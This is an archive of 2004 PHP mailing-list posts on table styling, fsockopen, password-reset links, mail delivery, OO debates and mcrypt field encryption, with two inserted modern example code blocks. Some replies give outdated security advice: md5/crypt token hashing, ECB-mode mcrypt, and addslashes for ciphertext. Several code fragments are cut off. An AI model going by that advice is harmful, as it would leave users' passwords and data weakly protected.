RE: [PHP] user password managment

2004-12-10 Thread Justin Palmer

> if($thisRow % 2 == "0"){


Should be: if(($thisRow % 2) == 0){

Regards,

Justin

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] fsockopen https problem

2004-12-10 Thread Maycon de Oliveira
Hi, I have a problem in my script; the error is Permission Denied (13).

 

 

 

 "full",
 "originator" => "33",
 "urn" => "2528",
 "surname" => "appleton",
 "submit" => "submit"
);

//build the post string
foreach($formdata AS $key => $val){
  $poststring .= urlencode($key) . "=" . urlencode($val) . "&";
}

// strip off trailing ampersand
$poststring = substr($poststring, 0, -1);

$fp = fsockopen("https://".$host, $port, $errno, $errstr, $timeout = 10);

if(!$fp){
  //error tell us
  echo "$errstr ($errno)\n";
}else{
  //send the server request
  fputs($fp, "POST $path HTTP/1.1\r\n");
  fputs($fp, "Host: $host\r\n");
  fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
  fputs($fp, "Content-length: ".strlen($poststring)."\r\n");
  fputs($fp, "Connection: close\r\n\r\n");
  fputs($fp, $poststring . "\r\n\r\n");

  //loop through the response from the server
  while(!feof($fp)) {
    echo fgets($fp, 4096);
  }

  //close fp - we are done with it
  fclose($fp);
}
?>



Re: [PHP] user password managment

2004-12-10 Thread Brad Ciszewski
I have changed the script around a bit; now it actually shows something, but
it doesn't alternate.

$thisRow = "0";

$query = mysql_query("SELECT * FROM security_images ORDER BY ID DESC",
$conn);
while($gt=mysql_fetch_array($query)){
extract($gt);
if($thisRow % 2 == "0"){
$backgroundColor = "#CC";
}else{
$backgroundColor = "#FF";
}
?>
  






  
   wrote in message
news:[EMAIL PROTECTED]
> > Does anybody have any tips or links for creating a system for managing
> > user's passwords. I want to make it so that when a user is created, an
> > email is sent with a link that allows them to set their password. The
> > link should only work for a set amount of time. I have ideas for
> > implementing something, but I have a hunch that there is some code
> > already out there for this. Does anybody know of any? Thanks!
>
> Use the sample code in http://php.net/md5 to create a hash, and store that
> in your database with a datetime value of now().  The hash will be quite
> unpredictable by the Bad Guys.
>
> Send that hash as part of the link in your email, and compare that hash to
> yours in the database.
>
> To make it even harder to bust, store the http://php.net/crypt *of* the
> md5 hash value, so that the actual value in the database is not what they
> need to send, but you can crypt what they send to see if it is the correct
> value.  That way, if somebody gains access to read your database, the
> values stored there do them no good.
>
> Course, it's more likely that somebody will gain access to the recipient's
> email, but there is little you can do about that in today's environment.
> Digitally-signed and secure email is nowhere near pervasive enough.
>
> An alternative is to send them a randomly-generated password, storing only
> the crypt() of it, of course, and then force them to change the password
> on first login.
>
> Since some email clients have a tough time getting long URLs, this can be
> less intensive on your Support/Help resources (your time) and it's really
> not a lot less secure than the long URL method.
>
> --
> Like Music?
> http://l-i-e.com/artists.htm
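
An added example (not code from the thread) of the link scheme described in the quoted reply: a random token goes in the e-mailed link, only a hash of it is stored together with its creation time, and the link stops working after a set lifetime. It uses random_bytes() and SHA-256 in place of the md5/crypt sample code the reply points to; the class name, table and one-hour lifetime are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example. SetPasswordTokens, the password_tokens table and the
// one-hour lifetime are hypothetical choices, not taken from the thread.
final class SetPasswordTokens
{
    private const TTL_SECONDS = 3600;

    /** @var PDO */
    private $db;

    public function __construct(PDO $db)
    {
        $this->db = $db;
        $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        // One outstanding token per user; the token itself is never stored.
        $db->exec(
            'CREATE TABLE IF NOT EXISTS password_tokens (
                user_id    INTEGER PRIMARY KEY,
                token_hash TEXT    NOT NULL,
                created_at INTEGER NOT NULL
            )'
        );
    }

    /** Create a token for the user and return the value that goes into the link. */
    public function issue(int $userId, int $now): string
    {
        // 256 bits from the OS CSPRNG. Because the token is high-entropy,
        // a plain SHA-256 of it is enough to make a database leak useless.
        $token = bin2hex(random_bytes(32));
        $stmt = $this->db->prepare(
            'INSERT OR REPLACE INTO password_tokens (user_id, token_hash, created_at)
             VALUES (?, ?, ?)'
        );
        $stmt->execute([$userId, hash('sha256', $token), $now]);
        return $token;
    }

    /** True exactly once for a matching, unexpired token. */
    public function redeem(int $userId, string $token, int $now): bool
    {
        $stmt = $this->db->prepare(
            'SELECT token_hash, created_at FROM password_tokens WHERE user_id = ?'
        );
        $stmt->execute([$userId]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($row === false) {
            return false; // nothing outstanding for this user
        }

        $expired = ($now - (int) $row['created_at']) > self::TTL_SECONDS;
        // hash_equals() compares in constant time.
        $matches = hash_equals((string) $row['token_hash'], hash('sha256', $token));

        // Single use: remove the row once it has been used or has expired.
        // A wrong guess does not remove it, so a third party cannot cancel the link.
        if ($expired || $matches) {
            $this->db->prepare('DELETE FROM password_tokens WHERE user_id = ?')
                     ->execute([$userId]);
        }
        return $matches && !$expired;
    }
}

// Constructed walk-through with an in-memory database and a fixed clock.
$tokens = new SetPasswordTokens(new PDO('sqlite::memory:'));
$t0     = 1102636800; // constructed timestamp
$token  = $tokens->issue(42, $t0);
echo 'https://example.com/set-password?uid=42&token=' . $token, "\n";

var_dump($tokens->redeem(42, str_repeat('0', 64), $t0 + 60)); // wrong token
var_dump($tokens->redeem(42, $token, $t0 + 60));              // correct, in time
var_dump($tokens->redeem(42, $token, $t0 + 61));              // replay of a used link

$late = $tokens->issue(42, $t0);
var_dump($tokens->redeem(42, $late, $t0 + 7200));             // correct, but too late
```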




Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 22:00:43 +, KJ <[EMAIL PROTECTED]> wrote:
> Let me try to paint another simple scenario:
> 
> 1. You have a shared hosting account with example.com hosted on it.
> 2. You want a guestbook setup on it, and you've found one that you like.
> 3. You install "phpMyFantasticGuestbook" onto your account.
> 4. It's a well used application and thus you don't go through the source
> to check for vulnerabilities.

It's usually the popular scripts that get cracked most often, Google
for PHPNuke, or vBulletin exploits for example.  Subscribe yourself to
some security lists and read for a couple weeks.  They just sit around
all day and discuss cracking web apps back and forth until someone
finds a vulnerability.

> 5. Joe Hacker has studied the script coz he's a tart that wants to piss
> people off and he has found a vulnerability.
> 6. Joe Hacker uses the vulnerability to change your account passwd. He
> then logs in as you and deletes all your files. He has access to your
> mysql password which was in the config file of phpMyFantasticGuestbook

Why would you allow your MySQL user to connect from anywhere besides
your web server?  Remote MySQL connections are a big no-no.

> and he deletes all your data, he then leaves a nice index.php in your
> account to say that he's been by.

Hope you had backups.  You did have backups, right?

> This is what I'm talking about, I hope this is clear. The vulnerability I
> described in one of my previous posts.
> 
> The "worry" that I'm expending comes from being hacked twice using this
> method, I think the amount of worry expended is in line with the amount
> of frustration that I have endured.

Sorry to hear that, I'd recommend you stop using
phpMyFantasticGuestbook immediately.  And anything else you don't feel
paranoid about to audit.

I'm no web app cracker but I'm paranoid as they get when it comes to
security.  Find yourself some security conscious friends.  Hang out. 
Learn.


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/




FW: [PHP] Multiple Inheritance

2004-12-10 Thread Justin Palmer
Sorry, Greg for sending this to you personally.

I also forgot to leave a link of a PHP Unit Testing Suite.

www.lastcraft.com/simple_test.php - Simple Test

Regards,

Justin
 


-Original Message-
From: Justin Palmer [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 7:51 PM
To: 'Greg Donald'
Subject: RE: [PHP] Multiple Inheritance


Hi,

What do you do for Unit Testing in procedural world?

I think that this is a nice addition to the OO world.  I have not heard
of a tool for procedural, is there any?

Kind regards,

Justin Palmer



-Original Message-
From: Greg Donald [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 7:42 PM
To: PHP general
Subject: Re: [PHP] Multiple Inheritance


On Fri, 10 Dec 2004 18:27:12 -0600, Ryan King <[EMAIL PROTECTED]> wrote:
> Yeah, but in the case of the Linux kernel there's no programming
> language that is both OO and close enough to the metal to program a 
> kernel (other than maybe Forth??).

C++, being a superset of C, would certainly be 'close enough to the
metal' and is indeed OO, yet the Linux kernel developers have chosen not
to use it.

> That means that we can't make a judgment as to the
> relative merits of procedural and object-based programming in kernel
> development.

Sure we can, but we don't have to since they already made it.  No OO in
the kernel was the verdict many times over:

http://marc.theaimsgroup.com/?l=linux-kernel


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/




Re: [PHP] PHP via DIAL-UP?

2004-12-10 Thread Sadeq Naqashzade
Hi,
It is simple. You only need to set up an incoming connection in network connections.
Note that this is not a PHP/Apache matter; it is a Windows matter. You can
find a detailed guide in Windows forums.
- Sadeq


On Fri, 10 Dec 2004 17:34:56 -0800 (PST), Police Trainee
<[EMAIL PROTECTED]> wrote:
> Hello. I have a computer at my office running Apache
> that I use to run PHP scripts with using
> http://localhost.
> 
> Is there anyway I can set up my computer to allow me
> to dial-in from home and use the webserver and my php
> applications?
> 
> It is a win 98 system with tcp/ip.
> 


-- 
Sadeq Naqashzade Yazdi
Sadeq [at] Yazd [dot] info


Phone: +98 351 626 7581
Fax: +98 351 626 4827





Re: [PHP] Re: PHP Security

2004-12-10 Thread Richard Lynch
I l wrote:
> Lets say you want to store someones picture.

Okay.

> In the database, you would insert the picture, who owns that picture,
> maybe
> the ip address and request headers of where that picture came from, the
> category, sub-category, sub-sub-category in which the picture belongs to,
> etc. You can gather and store as much information about that picture as
> you
> want with ease.

Except I can't just insert the picture.

I need to store it as a BLOB, which requires a lot more code.

> When you want to access that file and its attributes, you only have to do
> one database query.

Plus another chunk of code for the BLOB.

> Wouldn't you agree that this structure is much easier to manage than
> storing
> the file in a directory, then storing that extra information in a
> database?

No, I would not agree at all.

> Then to retrieve, you must do a database query and find the file in the
> FILESYSTEM (hoping it is still there). The code is much more complex

Actually, it's a whole lot simpler.

If I use some kind of key (such as the auto_increment field) in my
filename, I might not even need to query the database to find the image I
want -- I already know the filename just from the key.

Depends on the application, of course, and the privacy/security of the
image and its related data.

>> > And finally, file management is much much easier when you store the
>>files in
>> > a database.

What have you been smoking?
unlink is that much harder than a destroying a BLOB?

-- 
Like Music?
http://l-i-e.com/artists.htm




[PHP] Re: Php Mail not working properly

2004-12-10 Thread Manuel Lemos
Hello,
Phpdiscuss - Php Newsgroups And Mailing Lists wrote:
I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
Either the message bounced or it is in the queue waiting for delivery.
If you are using sendmail or exim try mailq from the root account to see 
if the message is in the queue.

If the message is not in the queue, it bounced to the return path 
address. You can set the return path address using the mail function 5th 
argument. You may also want to take a look at this class that lets you 
specify the return path address just setting the return-path: header. 
The examples show how to do that.

http://www.phpclasses.org/mimemessage
--
Regards,
Manuel Lemos
PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/
PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/
Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html


Re: [PHP] Php Mail not working properly

2004-12-10 Thread Matthew Sims
> I have a dedicated Red Hat linux boxed leased from Interland and the php
> mail function does not work.  I have found several articles on things to
> try and have tried everything I saw but to no avail.  I set up a php
> script to mail and then print the return code and I get a 1 (success).
> But the mail never arrives.  Is there any way I could get some help with
> this.  I could post my phpinfo() information or anything else that may
> help.
>

Can you send mail from the server? Meaning:

$ echo "Testing email" | sendmail [EMAIL PROTECTED]

Did you receive the mail? Can you send mail to the server itself by
replying back to the email?

If your answer is no to at least the first part, then you need to setup a
mail server.


-- 
--Matthew Sims
--




Re: [PHP] Multiple Inheritance

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 18:27:12 -0600, Ryan King <[EMAIL PROTECTED]> wrote:
> Yeah, but in the case of the Linux kernel there's no programming
> language that is both OO and close enough to the metal to program a
> kernel (other than maybe Forth??).

C++, being a superset of C, would certainly be 'close enough to the
metal' and is indeed OO, yet the Linux kernel developers have chosen
not to use it.

> That means that we can't make a judgment as to the
> relative merits of procedural and object-based programming in kernel
> development.

Sure we can, but we don't have to since they already made it.  No OO
in the kernel was the verdict many times over:

http://marc.theaimsgroup.com/?l=linux-kernel


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/




[PHP] Re: How to post form-data to a host using PHP

2004-12-10 Thread Manuel Lemos
Hello,
Minghua Yao wrote:
Does anybody know how to post form-data to a host using PHP? Thanks for the answer.
You may want to try this HTTP client class that can post forms including 
uploading files if necessary:

http://www.phpclasses.org/httpclient
--
Regards,
Manuel Lemos
PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/
PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/
Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html


Re: [PHP] Re: PHP Security

2004-12-10 Thread Paul Reinheimer
I believe the performance hit is much higher than the %2 increase you
are referring to:

$ cat /.../loadtest.php


$ ./ab -n 1000 -c 50 http://.../loadtest.php
Time taken for tests:   1.653 seconds
Complete requests:  1000
...
Requests per second:604.96 [#/sec] (mean)
Time per request:   82.65 [ms] (mean)
Time per request:   1.65 [ms] (mean, across all concurrent requests)
Transfer rate:  15177.50 [Kbytes/sec] received


$ ./ab -n 1000 -c 50 http://.../placeholderimage.png
Time taken for tests:   0.809 seconds
Complete requests:  1000
...
Requests per second:1236.09 [#/sec] (mean)
Time per request:   40.45 [ms] (mean)
Time per request:   0.81 [ms] (mean, across all concurrent requests)
Transfer rate:  30854.14 [Kbytes/sec] received


Apache 1.3.31, PHP 5.0.2

As you can see, once you move past the single request point, and
actually occupy the server for a few moments the hit is far more than
2%.



paul


-- 
Paul Reinheimer




Re: [PHP] Not quite PHP, but related...

2004-12-10 Thread Tom Rogers
Hi,

Saturday, December 11, 2004, 8:16:44 AM, you wrote:
BBBM> Hi you all,

BBBM> is that possible using .htaccess to redirect every request to a 
BBBM> specified script?

BBBM> for example if you have:

BBBM> http://www.yoursite.com/en/articles/blab.html

BBBM> where there isn't a en dir., so it would be redirected to

BBBM> public_html/site

BBBM> I could use error page, but it won't receive post, get, cookie and 
BBBM> session headers.

BBBM> Regards,
BBBM> Bruno B B Magalhaes


You can force apache to treat en as a php file with


ForceType application/x-httpd-php


in the .htaccess of the root directory (although I put it in the main httpd.conf
as I have access to it)

Then as an example, in the file en (note no .php)

";
?>
replace $file with whatever file is needed.
-- 
regards,
Tom




[PHP] php mail

2004-12-10 Thread PHPDiscuss - PHP Newsgroups and mailing lists
I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
help.




[PHP] PHP via DIAL-UP?

2004-12-10 Thread Police Trainee
Hello. I have a computer at my office running Apache
that I use to run PHP scripts with using
http://localhost. 

Is there anyway I can set up my computer to allow me
to dial-in from home and use the webserver and my php
applications?

It is a win 98 system with tcp/ip.






[PHP] Re: alternating table entry colors

2004-12-10 Thread Jason Motes
Brad Ciszewski wrote:
i need some assistance making my table (rows) change color for every other
data. here is what i have so far, but i get a "unexpected T_STRING error".
this error's line is: if($thisRow mode 2 == 0){
I believe you want
if($thisRow % 2 == 0)
not
if($thisRow mode 2 == 0)
http://us2.php.net/operators.arithmetic


[PHP] Php Mail not working properly

2004-12-10 Thread PHPDiscuss - PHP Newsgroups and mailing lists
I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
help.



RE: [PHP] Multiple Inheritance

2004-12-10 Thread Michael Sims
Please note that I am specifically *not* weighing in on the OO vs.
procedural religious war, but only wanted to make a couple of small
comments. :)

Richard Lynch wrote:
> I spend a *LOT* more time, digging through endless class files, of
> what are essentially name-spaces of singleton "objects" trying to
> find the line of code some idiot typed that is doing the wrong thing,
> but starting from 'index.php' I have *NO* *IDEA* how it got in there.

debug_backtrace() is your friend.  I have a tiny little backtrace function
that I use that accepts a label and dumps the label and the output of
debug_backtrace() to the terminal that I am SSH'ed into (via a redirect to
/dev/pts/[0-9]+).  If I have a complicated class hierarchy, or a series of
library files that include other files, etc. then I add a line into the
function that is giving me trouble:

backtrace('one');

If I have two functions I want to check I just add it again, but make sure
my label is different:

backtrace('two');

Then I request the page and check my terminal screen to see how the PHP
parser made it to the offending section(s) of code.  I even array_reverse()
the array returned from debug_backtrace() so it starts with index.php and
works its way down (I find this easier to follow).

> I end up having to "grep" source code just to find the damn thing.

A good editor would help here.  For example my editor of choice, jEdit
(www.jedit.org), allows you to search for a string (or a regex) across every
open file, and using its "HyperSearch" functionality shows an index of
filename and line number containing your search string that you can easily
click on to jump around.  Of course it only searches files that are already
open, and if you're dealing with a large number of files sometimes grep is
still necessary to narrow down which ones need to be opened, but it's still
an immense help to me.  I'm sure many other editors offer similar
functionality.

Just a couple of tangential thoughts...




Re: [PHP] recompiling php

2004-12-10 Thread Raditha Dissanayake
John Nichel wrote:
blackwater dev wrote:
Thanks John,
I tried the rpm and it throws errors that it can't find the php
package required by:
php-mysql
php-imap
php-idap
php-mbstring.
Thanks!

RPM and other binary informations suck. Remove them and install from 
source code.

--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 



Re: Re: [PHP] Close all open tags in HTML text

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 17:38:13 -0500, John Holmes
<[EMAIL PROTECTED]> wrote:
> strip_tags() is a rather worthless function, if you ask me.

strip_tags() is pretty handy when scraping another site.  Like the
other day I was asked to grab some links off a site where there was no
RSS feed available.. I easily left the anchor tags in but removed
everything else.


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/



Re: [PHP] Re: PHP Security

2004-12-10 Thread Richard Lynch
[EMAIL PROTECTED] wrote:
> Quoting I l <[EMAIL PROTECTED]>:
>> So, you would prefer storing the uploaded file in your directory than a
>> database? Have you tried either method?
>
> And, by the way, once you upload it into a database, it's not a file.
> It's just
> a data field.

Actually, internally, it *is* a file, or part of a file, depending on the
database implementation details. (*)

So you're adding overhead into the storage and retrieve of your content
for some unspecified (so far) benefit.

* I'm sure somebody somewhere is storing their entire db in RAM or on
Flash or whatever, but let's stick to the common usage here.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Multiple Inheritance

2004-12-10 Thread Ryan King
On Dec 10, 2004, at 3:50 PM, Greg Donald wrote:
On Fri, 10 Dec 2004 10:32:30 -0800 (PST), Richard Lynch 
<[EMAIL PROTECTED]> wrote:
What I do is not use classes.
I agree.
Some of the worst arguments for OO I've heard recently:
"OO programming lets you organize your code better."
So what you're saying is that you're not capable of organizing similar
functions into files and directories and using include() or require()
as needed?
Just because someone thinks using OOP is better doesn't mean they don't 
think procedural programming is insufficient.

"OO programming lets lots of developers work on the same code base
easier."
Malarkey[1].  The Linux Kernel crew gets along fine with no OO code.
Hundreds of thousands (millions?) of lines of code with thousands of
developers contributing daily.  A good revision control system is all 
you
need.
Yeah, but in the case of the Linux kernel there's no programming 
language that is both OO and close enough to the metal to program a 
kernel (other than maybe Forth??). In other words, OOP is not a good 
option for a kernel. That means that we can't make a judgment as to the 
relative merits of procedural and object-based programming in kernel 
development.

"Using OO programming is more efficient"
Where are your benchmarks?
Then you have scenarios where you have to come behind coders who think
they know OO, but they make poorly designed classes and end up calling
lots of functions statically like Object::foo().. which totally defeats
the purpose of objects along the way.
Now this certainly isn't an argument against OOP, but bad programming. 
I don't think anyone is going to argue for bad programming (unless they 
really like COBOL :-). Also, on the subject of static function calls, 
in my mind it's the closest PHP will ever get to having namespaces and 
preventing function name collisions.


At all.
And then you run into real life.  I'm working at a place right now
where they love OO programming.  We use Mojavi, PEAR, and Smarty
everywhere.  I understand OO pretty well I think, and I'm studying
the latest Mojavi framework.  Hopefully I'll be ahead of the curve
on the next project later down the road.  I don't really enjoy OO
programming and I don't think I'd ever code one of my own projects
with it, but I will go grab a PEAR module if it fits my needs. Code
re-use may be the only redeeming quality of OO programming, and
honestly I can re-use your code from a non-OO include file just as
easily.
Code reuse is a major reason for OOP. Obviously you believe that it is 
no better than old-fashioned procedural programming. I'm not going to 
disagree with you. Either approach is definitely doable. It is also 
possible to fuck up either approach.

It just doesn't make sense to instantiate objects for a script whose
total execution lifetime is less than a second or two.  The overhead
just isn't worth it.
This is a good point. There are many times where it doesn't make sense. 
However, PHP5 is much better at this than PHP4 is.

I think there's a major point missing here. OOP is just another way of 
providing abstractions to the programmer. Everything above machine-code 
is an abstraction of some sort and language designers try to provide 
abstractions which allow programmers to work better. Objects are 
abstractions, functions are abstractions, even variables are 
abstractions.

Why do we need abstractions? Because it helps us comprehend systems 
more easily. If we can only hold so many thoughts in our mind at 
once, it is advantageous to have high-order (more abstract) ideas, 
rather than lower-level ideas.

Just my $.02,
-ryan
--
http://theryanking.com/blog


Re: [PHP] ISP snippet

2004-12-10 Thread Brad Ciszewski
i need the script which will do this all automatically.. i know there is a
feature to get the server which the user is from.




"Danny Brow" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> On Thu, 2004-12-09 at 18:17 -0600, Brad Ciszewski wrote:
> > i need help to figure out the isp of a user. can anyone help me with
this?
>
> http://www.arin.net/whois/
>
> It will give you the owner of the IP address, i.e. Bell, AOL, etc.
>
> What's the reason you need the user's ISP?
>
> >
> >
> >
> > -Brad
> >
> > www.BradTechnologies.com
> > 99.9% Uptime
> > 24/7 Support
> > Packages as low as 3.50 p/month!
> > www.BradTechnologies.com
> >




[PHP] Re: encrypt/decrypt sqlite data

2004-12-10 Thread Shawn McKenzie
Shawn McKenzie wrote:
This is my first adventure with mcrypt and also the sqlite stuff.
Via file upload I am getting a SQL dump file and running it as a query
to insert data into a sqlite db.  This works great.
Then I am trying to use an update query to encrypt fields in all rows by
using the sqlite_create_function to run my encryption function (that uses 
$_SESSION['key'] which is an md5 hash of a pass phrase):

$db = sqlite_open("db");
sqlite_create_function($db, 'enc', 'encrypt', 1);

$sql  = 'UPDATE mytable SET f1=enc(f1);'
       .'UPDATE results SET f2=enc(f2);';

sqlite_query($db, $sql);

function encrypt($txt)
{
    $key = $_SESSION['key'];
    $txt = trim($txt);

    $iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
    $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

    $black = mcrypt_encrypt(MCRYPT_CAST_256, $key, $txt,
                            MCRYPT_MODE_ECB, $iv);

    return $black;
}

Then to test, I query the db and run each field of data thru a decrypt
function before displaying it:
$db = sqlite_open("db");
$sql = "SELECT * from mytable";
$row = sqlite_array_query($db, $sql);

echo "";
foreach ($row as $k => $v) {
    echo ""
        ."".decrypt($v['f1'])." "
        ."".decrypt($v['f2'])." "
        ."";
}
echo "";

function decrypt($black)
{
    $key = $_SESSION['key'];

    $iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
    $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

    $txt = mcrypt_decrypt(MCRYPT_CAST_256, $key, $black,
                          MCRYPT_MODE_ECB, $iv);

    return $txt;
}

The problem is that the data that is displayed is not the original data.
 Some fields seem to be truncated and some seem to be mostly decrypted
except for the last line or so.  For the fields f1 and f2 I have tried
text and blob.  The actual data is either one word of text or free 
flow text with line feeds.

TIA,
Shawn
Hmmm... Normally I would addslashes before stashing data in the db.  I 
should have done that here.  All is well now.  :-)

Thanks!
-Shawn
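
An added example (not Shawn's code) of field encryption that survives the database round trip described above: the ciphertext is authenticated, carries its own nonce, is base64-encoded so that it is plain text, and is written through bound parameters instead of addslashes(). It swaps in OpenSSL AES-256-GCM and PDO for mcrypt (removed from PHP core in 7.2) and the old sqlite_* functions; the function names, table layout, passphrase and sample rows are constructed.

```php
<?php
declare(strict_types=1);

// Added example; all names and sample data below are constructed.
const CIPHER    = 'aes-256-gcm';
const NONCE_LEN = 12;
const TAG_LEN   = 16;

/** Stretch a pass phrase into a 32-byte key; the salt is stored next to the data. */
function key_from_passphrase(string $passphrase, string $salt): string
{
    return hash_pbkdf2('sha256', $passphrase, $salt, 200000, 32, true);
}

/** Encrypt one field. The result is printable text: base64(nonce . tag . ciphertext). */
function encrypt_field(string $plain, string $key): string
{
    $nonce = random_bytes(NONCE_LEN); // fresh per value, stored with it
    $tag   = '';
    $ct = openssl_encrypt($plain, CIPHER, $key, OPENSSL_RAW_DATA, $nonce, $tag);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    return base64_encode($nonce . $tag . $ct);
}

/** Decrypt one field; throws if the value was truncated or altered. */
function decrypt_field(string $stored, string $key): string
{
    $raw = base64_decode($stored, true);
    if ($raw === false || strlen($raw) < NONCE_LEN + TAG_LEN) {
        throw new RuntimeException('stored value is malformed');
    }
    $nonce = substr($raw, 0, NONCE_LEN);
    $tag   = substr($raw, NONCE_LEN, TAG_LEN);
    $ct    = (string) substr($raw, NONCE_LEN + TAG_LEN);
    $plain = openssl_decrypt($ct, CIPHER, $key, OPENSSL_RAW_DATA, $nonce, $tag);
    if ($plain === false) {
        throw new RuntimeException('authentication failed');
    }
    return $plain;
}

/** Store constructed rows encrypted, read them back, compare with the originals. */
function demo_round_trip(string $key): bool
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE mytable (id INTEGER PRIMARY KEY, f1 TEXT)');

    $rows = ['oneword', "free flow text\nwith line feeds\nand a 'quote'  "];
    $insert = $db->prepare('INSERT INTO mytable (f1) VALUES (?)');
    foreach ($rows as $plain) {
        $insert->execute([encrypt_field($plain, $key)]); // bound, no escaping needed
    }

    $back = [];
    foreach ($db->query('SELECT f1 FROM mytable ORDER BY id') as $row) {
        $back[] = decrypt_field($row['f1'], $key);
    }
    return $back === $rows;
}

/** Flip one bit of a stored value and confirm that decryption refuses it. */
function demo_tamper_detected(string $key): bool
{
    $raw  = base64_decode(encrypt_field('oneword', $key), true);
    $last = strlen($raw) - 1;
    $raw[$last] = chr(ord($raw[$last]) ^ 1);
    try {
        decrypt_field(base64_encode($raw), $key);
        return false;
    } catch (RuntimeException $e) {
        return true;
    }
}

$key = key_from_passphrase('constructed pass phrase', random_bytes(16));
var_dump(demo_round_trip($key));
var_dump(demo_tamper_detected($key));
```

Unlike the ECB calls in the post, which ignore the IV and pad the last block with zero bytes, this form returns the text byte for byte, trailing whitespace included.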


[PHP] alternating table entry colors

2004-12-10 Thread Brad Ciszewski
i need some assistance making my table (rows) change color for every other
data. here is what i have so far, but i get a "unexpected T_STRING error".
this error's line is: if($thisRow mode 2 == 0){

+=+=+  SCRIPT BELOW  +=+=+

$thisRow = 0;

$query = mysql_query("SELECT * FROM security_images ORDER BY ID DESC");
while($gt=mysql_fetch_array($query)){
if($thisRow mode 2 == 0){
$backgroundColor = "#CC";
}else{
$backgroundColor = "#FF";
}

extract($gt);
echo ?>
  






  
  

+=+=+  SCRIPT ABOVE  +=+=+

thanx in advance!

- Brad

www.BradTechnologies.com - Web Services



Re: [PHP] Multiple Inheritance

2004-12-10 Thread Ryan King
On Dec 10, 2004, at 4:17 PM, Greg Beaver wrote:
The biggest hogs in php programming are:
1) unnecessary images and animated crap/unnecessary javascript
2) terrible database usage
3) too much complexity in the design
I would like to add
0) Compilation. Many scripts take longer to compile than execute. 
Adding a byte-code compiler will often increase performance by an order 
of magnitude.


It doesn't matter whether you are using OO or functions - if your 
application has too many lines of code per task, it won't be fast.
-ryan
--
http://theryanking.com/blog


Re: [PHP] Close all open tags in HTML text

2004-12-10 Thread Matt Palermo
I realize that I can use the strip_tags function to remove HTML.  But I 
don't want to remove HTML tags.  I just want to make sure all open HTML tags 
are closed.  For example if the user submits HTML with a  tag and 
never closes it, then the rest of the page will look screwed up.  I still 
want to allow them to use HTML, but I want to close tags that were left open 
by them.  This way it allows them to use HTML and it won't screw up the rest 
of the page.

Thanks,

Matt



"Richard Lynch" <[EMAIL PROTECTED]> wrote in message 
news:[EMAIL PROTECTED]
> Matt Palermo wrote:
>>  I would like to leave any HTML in there,
>
> Do you *TRUST* the people typing the HTML to not attack your server, or
> others, with cross-site scripting attacks?
>
> If not, go re-read the manual about strip_tags, and pay particular
> attention to the second, optional, argument.
>
>> but just make sure that ending
>> tags exist, so it doesn't screw up the rest of the page.  Strip tags 
>> would
>> just wipe out the HTML rather than allowing it and ending it safely.
>
> Strip tags will allow you to wipe out *DANGEROUS* HTML which will make
> your web server a source of problems not only to you, but to me as well.
>
> Please use strip_tags to allow only the tags you *NEED* the users to be
> able to use.
>
> It will only take you seconds, and it will save you (and us) a lot of
> grief in the long run.
>
> -- 
> Like Music?
> http://l-i-e.com/artists.htm 




Re: [PHP] array_merge_recursive

2004-12-10 Thread Sebastian
thanks for the help. i do have a question.. say instead of 2 keys in the
array there are 3 or 4.. how would that be done?
i do not know much about arrays so i am trying to learn.

thanks.


- Original Message - 
From: "Craig Slusher" <[EMAIL PROTECTED]>
To: "Sebastian" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, December 10, 2004 2:45 PM
Subject: Re: [PHP] array_merge_recursive


> foreach ($animal_counts as $animal => $total) {
> echo $animal. ':' .$total. '';
> }
>
>
> On Fri, 10 Dec 2004 13:51:36 -0500, Sebastian
